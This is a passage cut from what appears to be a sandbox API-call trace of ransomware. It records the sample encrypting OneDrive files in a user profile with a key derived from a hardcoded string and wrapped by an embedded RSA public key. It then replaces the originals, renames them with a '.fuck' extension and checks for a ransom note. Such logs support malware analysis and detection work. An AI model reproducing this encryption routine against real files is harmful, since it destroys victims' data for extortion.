pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.575] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.575] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.575] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.575] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.575] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.575] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.575] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.575] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.576] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.576] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.576] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.576] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.576] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.576] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.576] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.576] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.576] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.576] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.576] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.576] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.576] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.576] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.576] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.577] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.577] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.577] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.577] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.577] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.577] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x31e, lpOverlapped=0x0) returned 1 [0271.577] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x31e, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x320) returned 1 [0271.577] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x320, lpOverlapped=0x0) returned 1 [0271.577] CloseHandle (hObject=0x5d4c) returned 1 [0271.577] CloseHandle (hObject=0x5d3c) returned 1 [0271.577] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\OneDrive.adml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\adm\\onedrive.adml.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\OneDrive.adml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\adm\\onedrive.adml"), bFailIfExists=0) returned 1 [0271.582] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\OneDrive.adml", dwFileAttributes=0x0) returned 1 [0271.582] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\OneDrive.adml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\adm\\onedrive.adml.gsg")) returned 1 [0271.584] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\OneDrive.adml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\adm\\onedrive.adml"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\OneDrive.adml.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\adm\\onedrive.adml.fuck")) returned 1 [0271.585] CryptDestroyHash (hHash=0x2fa748) returned 1 [0271.585] CryptDestroyKey (hKey=0x2fa208) returned 1 [0271.585] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0271.585] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0271.585] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0271.585] GetLastError () returned 0x0 [0271.585] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\OneDrive.admx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\adm\\onedrive.admx")) returned 0x20 [0271.586] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\OneDrive.admx", dwFileAttributes=0x80) returned 1 [0271.586] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\OneDrive.admx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\adm\\onedrive.admx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0271.587] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\OneDrive.admx.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\adm\\onedrive.admx.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0271.588] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\OneDrive.admx.gsg", dwFileAttributes=0x2) returned 1 [0271.588] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0271.591] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0271.591] lstrlenA (lpString="gRZNKRGLTXaVulDshFSSTuldzMlQm") returned 29 [0271.591] CryptHashData (hHash=0x2fa4c8, pbData=0x28cb6e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0271.591] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa4c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fa208) returned 1 [0271.591] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0271.591] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0271.591] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f288f8) returned 1 [0271.592] CryptImportPublicKeyInfo (in: hCryptProv=0x2f288f8, dwCertEncodingType=0x1, pInfo=0x2f32840*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f32870*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f32878*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fab48) returned 1 [0271.592] CryptEncrypt (in: hKey=0x2fab48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0271.592] CryptEncrypt (in: hKey=0x2fab48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f28650*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f28650*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0271.592] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f28650*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f28650*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0271.593] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.612] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.612] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.614] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.615] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.615] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.615] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.615] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.616] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.616] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.616] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.616] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.616] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.616] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.616] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.617] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.617] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.617] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.617] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.617] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.617] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.617] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.617] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.617] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.617] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.617] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.617] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.618] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.618] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.618] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.618] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x36c, lpOverlapped=0x0) returned 1 [0271.618] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x36c, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x370) returned 1 [0271.618] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x370, lpOverlapped=0x0) returned 1 [0271.618] CloseHandle (hObject=0x5d3c) returned 1 [0271.618] CloseHandle (hObject=0x5d4c) returned 1 [0271.618] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\OneDrive.admx.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\adm\\onedrive.admx.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\OneDrive.admx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\adm\\onedrive.admx"), bFailIfExists=0) returned 1 [0271.623] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\OneDrive.admx", dwFileAttributes=0x0) returned 1 [0271.623] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\OneDrive.admx.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\adm\\onedrive.admx.gsg")) returned 1 [0271.625] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\OneDrive.admx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\adm\\onedrive.admx"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\OneDrive.admx.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\adm\\onedrive.admx.fuck")) returned 1 [0271.628] CryptDestroyHash (hHash=0x2fa4c8) returned 1 [0271.628] CryptDestroyKey (hKey=0x2fa208) returned 1 [0271.628] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0271.628] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0271.628] FindClose (in: hFindFile=0x2fa6c8 | out: hFindFile=0x2fa6c8) returned 1 [0271.628] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\adm\\readme_back_files.htm")) returned 0xffffffff [0271.628] AreFileApisANSI () returned 1 [0271.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0271.628] CreateFileW 